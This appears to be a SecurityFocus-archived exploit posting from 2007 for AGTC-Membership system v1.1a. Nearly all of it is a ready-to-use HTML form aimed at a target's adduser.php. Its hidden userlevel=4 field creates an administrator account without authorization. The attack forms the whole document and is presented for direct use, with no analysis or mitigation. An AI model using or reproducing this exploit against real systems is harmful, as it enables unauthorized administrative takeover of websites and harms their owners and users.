AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit Oct 28 2007 11:48PM
Guns 0x90 com ar
<!--

- Product : AGTC-Membership system

- Version : 1.1a

- Website : http://www.agtc.co.uk

- Author : 0x90

- HomePage : WwW.0x90.CoM.Ar

- Contact : Guns[at]0x90[dot]com[dot]ar

- Problem : Admin Added Access.

-->

<form name="form1" method="post" action="http://[target]/adduser.php">

<h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3>

<table width="40%" border="1" align="center" bordercolor="#000000">

<tr>

<td width="20%"><div align="right"><strong>User Name:</strong></div></td>

<td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td>

</tr>

<tr>

<td><div align="right"><strong>Password:</strong></div></td>

<td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td>

</tr>

<tr>

<td><div align="right"><strong>Email Address:</strong></div></td>

<td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td>

</tr>

<input name="userlevel" type="hidden" id="userlevel" value="4">

<tr>

<td> </td>

<td><input type="submit" name="Submit" value="Add User">

<input type="reset" name="Submit2" value="Reset"></form></td>

</tr>

</table>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus